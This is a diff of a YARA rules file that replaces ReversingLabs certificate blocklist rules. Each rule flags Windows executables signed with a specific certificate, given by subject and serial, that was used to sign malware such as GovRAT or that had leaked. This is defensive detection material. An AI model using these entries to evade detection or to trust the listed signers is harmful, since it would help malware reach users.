-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8416-L8432"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2e24ed0bd0bf3c36cae4bf106a2c17386bfb58b76372068be9745c2d501f30fc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1362-L1378"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "69ddc58b6fec159d6eded8c78237a6a0626b1aedb58b0c9867b758fd09db46ad"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10903,21 +35568,21 @@ rule REVERSINGLABS_Cert_Blocklist_21E3Cae5B77C41528658Ada08509C392 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Network Design International Holdings Limited" and pe.signatures [ i ] . serial == "21:e3:ca:e5:b7:7c:41:52:86:58:ad:a0:85:09:c3:92" and 1609233559 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "58:a5:41:d5:0f:9e:2f:ab:43:80:c6:a2:ed:43:3b:82" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_2Abd2Eef14D480Dfea9Ca9Fdd823Cf03 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5F273626859Ae4Bc4Becbbeb71E2Ab2D : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "d6cb1371-113d-5155-aed2-c575321f0973"
+		id = "a80dcaba-73f9-51d0-a75a-b6348fd305c6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8434-L8450"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2dfc220c44d3dda28a253e5115ae9a087b6ddbf1a7ca1e9bcae5bd9ac5b2e1a0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1380-L1396"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c8be504f075041508f299b1df03d9cb9e58d9a89f49b7a926676033d18b108ba"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10927,21 +35592,21 @@ rule REVERSINGLABS_Cert_Blocklist_2Abd2Eef14D480Dfea9Ca9Fdd823Cf03 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BE SOL d.o.o." and pe.signatures [ i ] . serial == "2a:bd:2e:ef:14:d4:80:df:ea:9c:a9:fd:d8:23:cf:03" and 1611100800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "5f:27:36:26:85:9a:e4:bc:4b:ec:bb:eb:71:e2:ab:2d" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_86909B91F07F9316984D888D1E28Ab76 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B1Ad46Ce4Db160B348C24F66C9663178 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "The digital certificate has leaked."
 		author = "ReversingLabs"
-		id = "3cde0016-14d8-5b3a-860e-f5128f899542"
+		id = "df34eb28-18ec-568b-8257-0b2f7959868c"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8452-L8470"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "abd84492ed008125688a53e20d51780fa0b8c2309dcf751ff76a03d6f337beaa"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1398-L1414"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "59ce2b7a2e881853d07446b3dda74b296f2be09651364d0e131552cf76dab751"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10951,21 +35616,21 @@ rule REVERSINGLABS_Cert_Blocklist_86909B91F07F9316984D888D1E28Ab76 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dantherm Intelligent Monitoring A/S" and ( pe.signatures [ i ] . serial == "00:86:90:9b:91:f0:7f:93:16:98:4d:88:8d:1e:28:ab:76" or pe.signatures [ i ] . serial == "86:90:9b:91:f0:7f:93:16:98:4d:88:8d:1e:28:ab:76" ) and 1611273600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Adobe Systems" and pe.signatures [ i ] . serial == "b1:ad:46:ce:4d:b1:60:b3:48:c2:4f:66:c9:66:31:78" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D1B8F1Fe56381Befdb2E73Ffef2A4B28 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_256541E204619033F8B09F9Eb7C88Ef8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "226371ea-670f-52f2-8dfc-78b30a29a5cc"
+		id = "d4a5eb19-2964-5d3a-b4c5-ee4396e76814"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8472-L8490"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c118cb46914e7a6df8dd33dd14d5f9cf2692d98311503ec850cc66f02c20839e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1416-L1432"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e33cedf1dd24ac73f77461de0cef25cad57909be2a69469fec450ead7da85c65"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10975,21 +35640,21 @@ rule REVERSINGLABS_Cert_Blocklist_D1B8F1Fe56381Befdb2E73Ffef2A4B28 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Sein\\xC3\\xA4joen Squash ja Bowling Oy" and ( pe.signatures [ i ] . serial == "00:d1:b8:f1:fe:56:38:1b:ef:db:2e:73:ff:ef:2a:4b:28" or pe.signatures [ i ] . serial == "d1:b8:f1:fe:56:38:1b:ef:db:2e:73:ff:ef:2a:4b:28" ) and 1617667200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HON HAI PRECISION INDUSTRY CO. LTD." and pe.signatures [ i ] . serial == "25:65:41:e2:04:61:90:33:f8:b0:9f:9e:b7:c8:8e:f8" and 1424303999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D4Ef1Ab6Ab5D3Cb35E4Efb7984Def7A2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_00E8Cc18Cf100B6B27443Ef26319398734 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing GovRAT malware."
 		author = "ReversingLabs"
-		id = "41b2e05f-1dcd-5ebc-97da-275512deaf72"
+		id = "f7e80c51-9dcf-599a-8164-c07cf4c9c5ff"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8492-L8510"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ecc2f6bfda1a0afd016f0a5183c0d1cdfe5d5e06c893a7d9a3d7cb7f9bc4bf16"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1434-L1452"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "68e9df056109cae41d981090c7a98ddc192a445647d7475569ddbe4118e570c5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -10999,21 +35664,21 @@ rule REVERSINGLABS_Cert_Blocklist_D4Ef1Ab6Ab5D3Cb35E4Efb7984Def7A2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REIGN BROS ApS" and ( pe.signatures [ i ] . serial == "00:d4:ef:1a:b6:ab:5d:3c:b3:5e:4e:fb:79:84:de:f7:a2" or pe.signatures [ i ] . serial == "d4:ef:1a:b6:ab:5d:3c:b3:5e:4e:fb:79:84:de:f7:a2" ) and 1611187200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Syngenta" and ( pe.signatures [ i ] . serial == "00:e8:cc:18:cf:10:0b:6b:27:44:3e:f2:63:19:39:87:34" or pe.signatures [ i ] . serial == "e8:cc:18:cf:10:0b:6b:27:44:3e:f2:63:19:39:87:34" ) and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_066276Af2F2C7E246D3B1Cab1B4Aa42E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_62Af28A7657Ba8Ab10Fa8E2D47250C69 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing GovRAT malware."
 		author = "ReversingLabs"
-		id = "97f791d5-7a73-5da7-984e-32bb94d0e83f"
+		id = "cba20a1b-5d24-5a1f-8f2f-8c47add846d6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8512-L8528"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "30d4fa2cbc75d3a6258cdf0374159f25ea152c39784f8b7e9c461978df865dc0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1454-L1470"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c3c034cb4e2c65e2269fbfd9c045eb294badde60389ae62ed694ea4d61c5eb35"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11023,21 +35688,21 @@ rule REVERSINGLABS_Cert_Blocklist_066276Af2F2C7E246D3B1Cab1B4Aa42E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IQ Trade ApS" and pe.signatures [ i ] . serial == "06:62:76:af:2f:2c:7e:24:6d:3b:1c:ab:1b:4a:a4:2e" and 1616630400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AFINA Fintek" and pe.signatures [ i ] . serial == "62:af:28:a7:65:7b:a8:ab:10:fa:8e:2d:47:25:0c:69" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_65Cd323C2483668B90A44A711D2A6B98 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_04C8Eca7243208A110Dea926C7Ad89Ce : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing GovRAT malware."
 		author = "ReversingLabs"
-		id = "e2ed910d-2264-58c1-a1a0-3c131020a2cf"
+		id = "484d0aa6-0447-5e60-946b-89b01a5e43dd"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8530-L8546"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "653aff6f3913f1bf51e90e7a835dbb5441457175797cefdddd234a6c2c0f11ad"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1472-L1488"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0012436e83704397026a8b2e500e5d61915e0f4c8ad4100176e200a975562e8f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11047,21 +35712,21 @@ rule REVERSINGLABS_Cert_Blocklist_65Cd323C2483668B90A44A711D2A6B98 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Giperion" and pe.signatures [ i ] . serial == "65:cd:32:3c:24:83:66:8b:90:a4:4a:71:1d:2a:6b:98" and 1602547200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, SINGH ADITYA" and pe.signatures [ i ] . serial == "04:c8:ec:a7:24:32:08:a1:10:de:a9:26:c7:ad:89:ce" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5A17D5De74Fd8F09Df596Df3123139Bb : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_157C3A4A6Bcf35Cf8453E6B6C0072E1D : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing GovRAT malware."
 		author = "ReversingLabs"
-		id = "4a3ffa4a-c080-5d76-9655-010cde091ae2"
+		id = "4bae3fb2-7e30-598e-8708-b985697bf63a"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8548-L8564"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7ed62740fe191d961ad32b2a79463cc9cbce557ea757e413860f7b4974904c03"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1490-L1506"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2a68051ab6d0b967f08e44d91b9f13d75587ea0f16e2a5536ccf5898445e1a58"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11071,21 +35736,21 @@ rule REVERSINGLABS_Cert_Blocklist_5A17D5De74Fd8F09Df596Df3123139Bb : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ACTA FIS d.o.o." and pe.signatures [ i ] . serial == "5a:17:d5:de:74:fd:8f:09:df:59:6d:f3:12:31:39:bb" and 1611273600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Favorite-III" and pe.signatures [ i ] . serial == "15:7c:3a:4a:6b:cf:35:cf:84:53:e6:b6:c0:07:2e:1d" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_15Da61D7E1A631803431561674Fb9B90 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_04422F12037Bc2032521Dbb6Ae02Ea0E : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing GovRAT malware."
 		author = "ReversingLabs"
-		id = "07518dc2-bd6c-5a4c-b537-68f5a462cdc2"
+		id = "0dc659e8-1f3b-5130-a776-dd9e4141f5f3"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8566-L8582"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "75d2c3b47fe9c863812f2c98fc565af9050b909a03528e2ea4a96542a3ec0c0d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1508-L1524"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "381d749d24121d6634656fd33adcda5c3e500ee77a6333f525f351a2ee589e2c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11095,21 +35760,21 @@ rule REVERSINGLABS_Cert_Blocklist_15Da61D7E1A631803431561674Fb9B90 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JAY DANCE STUDIO d.o.o." and pe.signatures [ i ] . serial == "15:da:61:d7:e1:a6:31:80:34:31:56:16:74:fb:9b:90" and 1610668800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Muhammad Lee" and pe.signatures [ i ] . serial == "04:42:2f:12:03:7b:c2:03:25:21:db:b6:ae:02:ea:0e" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Ab21306B11Ff280A93Fc445876988Ab : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_65Eae6C98111Dc40Bf4F962Bf27227F2 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing GovRAT malware."
 		author = "ReversingLabs"
-		id = "656bb2a6-bb41-5190-af10-280351e64c66"
+		id = "34275efd-b941-56f5-8e1b-30a43f1936e2"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8584-L8600"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0cda954aa807336a6737716d0fa43d696376c240ab7be9d8477baf8800604bf1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1526-L1542"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "20c0f4e9783586e68ff363fe6a72398f6ea27aef5d25f98872d1203ce1a0c9bd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11119,21 +35784,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Ab21306B11Ff280A93Fc445876988Ab : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABC BIOS d.o.o." and pe.signatures [ i ] . serial == "7a:b2:13:06:b1:1f:f2:80:a9:3f:c4:45:87:69:88:ab" and 1611014400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, BHARATH KUCHANGI" and pe.signatures [ i ] . serial == "65:ea:e6:c9:81:11:dc:40:bf:4f:96:2b:f2:72:27:f2" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_634E16E38F12E9A71Aca08E4C6B2Dbb9 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_12D5A4B29Fe6156D4195Fba55Ae0D9A9 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing GovRAT malware."
 		author = "ReversingLabs"
-		id = "4aa7bea7-06fb-5d90-bac4-c8ca1ca5c02f"
+		id = "45c37c98-1006-51e4-8832-b8e5c9fba416"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8602-L8618"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "08950f276e5cf3fe4b5f7421ba671dfd72585aac3bbed7868fdb0e5aa90ec10e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1544-L1560"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "860550745f6dbcd7dd0925d9b8f04e8e08e8b7c06343a4c070e131a815c42e12"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11143,21 +35808,21 @@ rule REVERSINGLABS_Cert_Blocklist_634E16E38F12E9A71Aca08E4C6B2Dbb9 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AUTO RESPONSE LTD CYF" and pe.signatures [ i ] . serial == "63:4e:16:e3:8f:12:e9:a7:1a:ca:08:e4:c6:b2:db:b9" and 1616112000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Marc Chapon" and pe.signatures [ i ] . serial == "12:d5:a4:b2:9f:e6:15:6d:41:95:fb:a5:5a:e0:d9:a9" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_289051A83F350A2C600187C99B6C0A73 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0087D60D1E2B9374Eb7A735Dce4Bbdae56 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing GovRAT malware."
 		author = "ReversingLabs"
-		id = "55497d57-7d4f-50e1-85a6-e60786084e3f"
+		id = "8759a40a-648e-548e-a519-bedc812aefe4"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8620-L8636"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cd5d6f95f0cfdbf8d37ea78d061ce00512b6cb7c899152b1640673494d539dd1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1562-L1580"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d6e0d22e926a237f1cc6b71c6f8ce01e497723032c9efba1e6af7327a786b608"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11167,21 +35832,21 @@ rule REVERSINGLABS_Cert_Blocklist_289051A83F350A2C600187C99B6C0A73 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HALL HAULAGE LTD LTD" and pe.signatures [ i ] . serial == "28:90:51:a8:3f:35:0a:2c:60:01:87:c9:9b:6c:0a:73" and 1616716800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMO-K Limited Liability Company" and ( pe.signatures [ i ] . serial == "00:87:d6:0d:1e:2b:93:74:eb:7a:73:5d:ce:4b:bd:ae:56" or pe.signatures [ i ] . serial == "87:d6:0d:1e:2b:93:74:eb:7a:73:5d:ce:4b:bd:ae:56" ) and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_818631110B5D14331Dac7E6Ad998B902 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0860C8A7Ed18C3F030A32722Fd2B220C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6a8f3abd-199c-5e2f-a60e-46e869831445"
+		id = "335a1cd3-520a-5f0f-abda-6ec8a122de4b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L8638-L8656"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "5e0de3848adf933632c2eb8cf5ead61d6470237386ba8b48d57a278d99dba324"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L1582-L1598"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3c777fb157a6669bfdf3143e77f69265e09458a2b42b75b72680eb043da71e85"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -11191,21 +35856,21 @@ rule REVERSINGLABS_Cert_Blocklist_818631110B5D14331Dac7E6Ad998B902 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2 TOY GUYS LLC" and ( pe.signatures [ i ] . serial == "00:81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" or pe.signatures [ i ] . serial == "81:86:31:11:0b:5d:14:33:1d:ac:7e:6a:d9:98:b9:02" ) and 1571616000 <= pe.signatures [ i ] . not_after )
